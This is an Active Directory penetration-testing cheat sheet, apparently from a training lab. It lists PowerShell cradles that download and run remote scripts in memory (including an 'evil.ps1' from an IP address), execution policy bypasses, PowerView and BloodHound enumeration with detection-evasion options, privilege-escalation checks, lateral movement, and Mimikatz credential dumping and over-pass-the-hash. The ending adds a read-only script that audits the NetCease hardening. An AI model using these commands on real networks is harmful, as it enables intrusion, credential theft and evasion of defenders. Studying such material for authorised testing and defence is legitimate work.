# Cheat Sheet

## General

```
### Shows a brief help about the cmdlet or topic
Get-Help
Get-Help Get-Help
Get-Help *
Get-Help process
Get-Help Get-Item -Full
Get-Help Get-Item -Examples

### List all cmdlets
Get-Command -CommandType cmdlet

### View privileges
whoami /priv

### View name of host
hostname

### Load PowerView
. .\PowerView.ps1

### Load the ActiveDirectory module
Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory\ActiveDirectory.psd1
```

## PowerShell Script Execution

```
### Download and execute a script in memory
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

### Using the Internet Explorer COM object
$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

### PSv3 onwards
iex (iwr 'http://192.168.230.1/evil.ps1')

### Using the Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText

### Using System.Net.WebRequest
$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
```

## Execution Policy

### PowerShell

```
# Execution Policy
### Several ways to bypass (the execution policy is not a security boundary)
powershell -ExecutionPolicy bypass
powershell -c <cmd>
powershell -encodedcommand <base64_command>
$env:PSExecutionPolicyPreference="bypass"
```

## Import Modules

### PowerShell

```
# Import Modules
### A module can be imported with:
Import-Module <modulepath>

### All the commands in a module can be listed with:
Get-Command -Module <modulename>
```

## Domain Enumeration

### Using .NET classes

```
# Domain
### Get current domain
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADClass::GetCurrentDomain()
```

### Using PowerView

```
# Domain
### Get current domain
Get-NetDomain

### Get object of another domain
Get-NetDomain -Domain <domain>
Get-NetDomain -Domain moneycorp.local

### Get domain SID for the current domain
Get-DomainSID

### Get domain policy for the current domain
Get-DomainPolicy
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos Policy"

# Domain Controller
### Get domain controllers for the current domain
Get-NetDomainController

### Get domain controllers for another domain
Get-NetDomainController -Domain <domain>
Get-NetDomainController -Domain moneycorp.local

# Users
### Get a list of users in the current domain
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select samaccountname
Get-NetUser -Username student1

### Get list of all properties for users in the current domain
Get-UserProperty
Get-UserProperty -Properties pwdlastset
Get-UserProperty -Properties logoncount
Get-UserProperty -Properties badpwdcount

### Search for a particular string in a user's attributes
Find-UserField -Verbose
Find-UserField -SearchField Description -SearchTerm "pass"
Find-UserField -SearchField Description -SearchTerm "built"

# Computers
### Get a list of computers in the current domain
Get-NetComputer
Get-NetComputer -OperatingSystem "*Server 2016*"
Get-NetComputer -FullData
Get-NetComputer -FullData | select operatingsystem
Get-NetComputer -Ping

# Domain Groups
### Get all the groups in the current domain
Get-NetGroup
Get-NetGroup -Domain <targetdomain>
Get-NetGroup -FullData
Get-NetGroup 'Domain Admins' -FullData

### Get all groups containing the word "admin" in group name
Get-NetGroup -GroupName 'Domain Admins'
Get-NetGroup -GroupName 'Domain Admins' -FullData
Get-NetGroup -GroupName *admin*
Get-NetGroup -GroupName *admin* -Domain moneycorp.local

### Get all the members of the Domain Admins group
Get-NetGroupMember -GroupName 'Domain Admins'
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
Get-NetGroupMember -GroupName "Enterprise Admins" -Domain moneycorp.local

### Get the group membership for a user
Get-NetGroup -UserName "student1"

# Local Groups
### Requisites: Administrator privileges on non-DC machines
### List all the local groups on a machine
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups

### Get members of all the local groups on a machine
Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse

# Logged users
### Requisites: needs local admin rights on the target
### Get actively logged users on a computer
Get-NetLoggedon -ComputerName <servername>

### Get locally logged users on a computer
Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local

### Get the last logged users on a computer
Get-LastLoggedon -ComputerName <servername>

# Files
### Find shares on hosts in current domain
Invoke-ShareFinder -Verbose
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC

### Find sensitive files on computers in the domain
Invoke-FileFinder -Verbose

### Get all fileservers of the domain
Get-NetFileServer

# GPO
### Get list of GPO in current domain
Get-NetGPO
Get-NetGPO | select displayname

### Get list of GPO applied to the current host (hostname: dcorp-stdadmin)
Get-NetGPO -Computer dcorp-stdadmin.dollarcorp.moneycorp.local

### Get GPO(s) which use Restricted Groups or groups.xml for interesting users
Get-NetGPOGroup

# Users, local groups and GPO
### Get users which are in a local group of a machine using GPO
Find-GPOComputerAdmin -ComputerName dcorp-student1.dollarcorp.moneycorp.local

### Get machines where the given user is member of a specific group
Find-GPOLocation -UserName student1 -Verbose

# OU
### Get OUs in a domain
Get-NetOU
Get-NetOU -FullData

### Get GPO applied on an OU. Read the GPO name from the gplink attribute returned by Get-NetOU
Get-NetGPO
Get-NetGPO -GPOname '{F22SASD-ASD4-486E-A657-96SC65S6A}'

# ACL
### Get the ACLs associated with the specified object
Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs

### Get the ACLs associated with the specified prefix to be used for search
Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose

### Get the ACLs associated with the specified LDAP path to be used for search
Get-ObjectAcl -ADSpath "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose

### Search for interesting ACEs
Invoke-ACLScanner -ResolveGUIDs

### Get the ACLs associated with the specified path
Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"

# Trusts
### Get a list of all domain trusts for the current domain
Get-NetDomainTrust
Get-NetDomainTrust -Domain us.dollarcorp.moneycorp.local

# Forest
### Get details about the current forest
Get-NetForest
Get-NetForest -Forest eurocorp.local

### Get all domains in the current forest
Get-NetForestDomain
Get-NetForestDomain -Forest eurocorp.local

### Get all global catalogs for the current forest
Get-NetForestCatalog
Get-NetForestCatalog -Forest eurocorp.local

### Map trusts of a forest
Get-NetForestTrust
Get-NetForestTrust -Forest eurocorp.local
```

### Using the ActiveDirectory module

```
# Domain
### Get current domain
Get-ADDomain

### Get object of another domain
Get-ADDomain -Identity <domain>
Get-ADDomain -Identity moneycorp.local

### Get domain SID for the current domain
(Get-ADDomain).DomainSID

# Domain Controller
### Get domain controllers for the current domain
Get-ADDomainController

### Get domain controllers for another domain
Get-ADDomainController -DomainName moneycorp.local -Discover
Get-ADDomainController -DomainName <domain> -Discover

# Users
### Get a list of users in the current domain
Get-ADUser -Filter * -Properties *
Get-ADUser -Filter * -Properties * | select Name
Get-ADUser -Identity student1
Get-ADUser -Identity student1 -Properties *

### Get list of all properties for users in the current domain
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}

### Search for a particular string in a user's attributes
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description

# Computers
### Get a list of computers in the current domain
Get-ADComputer -Filter *
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
Get-ADComputer -Filter * -Properties *

# Groups
### Get all the groups in the current domain
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter * -Properties *

### Get all groups containing the word "admin" in group name
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name

### Get all the members of the Domain Admins group
Get-ADGroupMember -Identity "Domain Admins" -Recursive

### Get the group membership for a user
Get-ADPrincipalGroupMembership -Identity student1
Get-ADPrincipalGroupMembership -Identity studentadmin

# GPO
### Get list of GPO in current domain (GroupPolicy module)
Get-GPO -All

### Resultant Set of Policy (RSoP) report for the current host
Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html

# OU
### Get OUs in a domain
Get-ADOrganizationalUnit -Filter * -Properties *

### Get GPO applied on an OU. Read the GPO name from the gplink attribute returned by Get-NetOU (GroupPolicy module)
Get-GPO -Guid F22SASD-ASD4-486E-A657-96SC65S6A

# ACL
### Enumerate ACLs without resolving GUIDs
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access

# Trusts
### Get a list of all domain trusts for the current domain
Get-ADTrust
Get-ADTrust -Identity us.dollarcorp.moneycorp.local

# Forest
### Get details about the current forest
Get-ADForest
Get-ADForest -Identity eurocorp.local

### Get all domains in the current forest
(Get-ADForest).Domains

### Get all global catalogs for the current forest
Get-ADForest | select -ExpandProperty GlobalCatalogs

### Map trusts of a forest
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
```

### BloodHound

```
### Load the SharpHound ingestor and run a full collection
. C:\AD\Tools\BloodHound-master\Ingestors\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose

### To avoid detections like ATA
Invoke-BloodHound -CollectionMethod All -ExcludeDC
```

## User Hunting

### Using PowerView

```
# Local Admin Access
### Find all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
### This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then runs a multi-threaded Invoke-CheckLocalAdminAccess against each machine.

### Find local admins on all machines of the domain (needs administrator privileges on non-DC machines)
Invoke-EnumerateLocalAdmin -Verbose
### This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then runs a multi-threaded Get-NetLocalGroup against each machine.

# Sessions
### Find computers where a domain admin (or specified user/group) has sessions
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
### This function queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using Get-NetGroupMember, gets a list of computers (Get-NetComputer) and lists sessions and logged-on users (Get-NetSession/Get-NetLoggedon) from each machine.

### To confirm admin access
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -Verbose

# Logged-in
### Find computers where a domain admin is logged in
Invoke-UserHunter -Stealth
### This option queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using Get-NetGroupMember, gets a list of only the high-traffic servers (DCs, file servers and distributed file servers) so that less traffic is generated, and lists sessions and logged-on users (Get-NetSession/Get-NetLoggedon) from each machine.

### List sessions on a single machine
Get-NetSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local
```

### Additional

```
# Hardening
### NetCease changes the permissions on NetSessionEnum; the Server service must be restarted for the change to apply
.\NetCease.ps1
Restart-Service -Name Server -Force

### Revert the change
.\NetCease.ps1 -Revert
```

## Privilege Escalation - Local

### Using PowerUp

```
### Requisites
###   StartName: LocalSystem
###   CanRestart: True

### Get services with unquoted paths and a space in their name
Get-ServiceUnquoted -Verbose

### Get services where the current user can write to its binary path or change arguments to the binary
Get-ModifiableServiceFile -Verbose

### Get the services whose configuration the current user can modify
Get-ModifiableService -Verbose

### Run all checks
Invoke-AllChecks
```

### In Jenkins

```
### With Administrator privileges
### With the ability to configure builds
```

### Additional

```
# Configuration
### beRoot
.\beRoot.exe

### Privesc
. .\privesc.ps1
Invoke-Privesc
```

## Lateral Movement

```
# PSSession
### Method 1
Enter-PSSession -ComputerName <computer>
### Requisites: Administrator privileges on dcorp-adminsrv
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

### Method 2
$sess = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
Enter-PSSession -Session $sess

# Commands
### Use below to execute commands or scriptblocks
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {whoami;hostname}

### Use below to execute scripts from files
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -FilePath C:\AD\Tools\PowerUp.ps1

### Use below to execute a locally loaded function on the remote machines
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock ${function:hello}

### In this case, we are passing arguments. Keep in mind that only positional arguments can be passed this way:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList <arguments>

### In below, a function call within the script is used
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

### Additional
Invoke-Command -FilePath C:\AD\Tools\hello.ps1 -Session $sess
Enter-PSSession -Session $sess

### Use below to execute "stateful" commands using Invoke-Command:
$Sess = New-PSSession -ComputerName Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}

# Invoke-Mimikatz
### Dump credentials on a local machine
Invoke-Mimikatz -DumpCreds

### Dump credentials on multiple remote machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
### Invoke-Mimikatz uses the PowerShell remoting cmdlet Invoke-Command to do the above

### "Over pass the hash": generate tokens from hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"'

# Additional
### Language Mode
$ExecutionContext.SessionState.LanguageMode
Invoke-Command -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local -ScriptBlock {$ExecutionContext.SessionState.LanguageMode}
```
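## Verifying the NetSessionEnum Hardening

The NetCease hardening listed under User Hunting changes who is allowed to call NetSessionEnum, which is what the session-hunting cmdlets above rely on. The script below is an added example, not part of the original cheat sheet or of NetCease itself, that audits the current state on a host: it assumes NetCease edits the security descriptor stored in the `SrvsvcSessionInfo` value under `HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity`, decodes that descriptor and reports whether Authenticated Users (S-1-5-11) still hold an allow ACE.

```powershell
# Added example (not from the cheat sheet or NetCease): audit who may call NetSessionEnum
# on this host by decoding the DACL stored in the registry. Assumption: this is the
# value that NetCease rewrites. Read-only; run as an administrator on the host.
$keyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity'
$valueName = 'SrvsvcSessionInfo'

function Get-NetSessionEnumAccess {
    # The value is a REG_BINARY self-relative security descriptor
    $bytes = (Get-ItemProperty -Path $keyPath -Name $valueName).$valueName
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        # Resolve the SID to a name where possible; fall back to the raw SID
        try   { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid.Value }
        [pscustomobject]@{
            Principal  = $name
            SID        = $sid.Value
            AceType    = $ace.AceType
            AccessMask = ('0x{0:X}' -f $ace.AccessMask)
        }
    }
}

$aces = Get-NetSessionEnumAccess
$aces | Format-Table -AutoSize

# NetCease's effect is the removal of the Authenticated Users allow entry
$authUsers = $aces | Where-Object { $_.SID -eq 'S-1-5-11' -and $_.AceType -eq 'AccessAllowed' }
if ($authUsers) {
    Write-Warning 'Authenticated Users can still enumerate sessions (NetCease not applied, or reverted).'
} else {
    Write-Host 'No allow ACE for Authenticated Users on NetSessionEnum: NetCease-style hardening is in place.'
}
```

Running it before and after `.\NetCease.ps1` (with the Server service restarted in between) shows the Authenticated Users entry disappearing; `.\NetCease.ps1 -Revert` brings it back.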